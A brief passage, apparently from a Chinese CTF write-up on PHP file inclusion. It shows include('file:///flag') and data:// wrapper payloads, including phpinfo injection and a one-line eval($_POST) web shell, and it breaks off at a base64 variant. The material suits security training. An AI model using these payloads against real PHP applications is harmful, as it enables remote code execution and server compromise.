最终执行的操作语句:include("file:///flag"); Level 2 data协议 在注释引导中对该协议已经介绍的非常详细,其支持文本和base64形式。 如果传入的数据是PHP代码,就会执行代码: data://text/plain,<?php phpinfo();?> data://text/plain,<?php eval($_POST['helloctf']);?> data://text/plain;base64...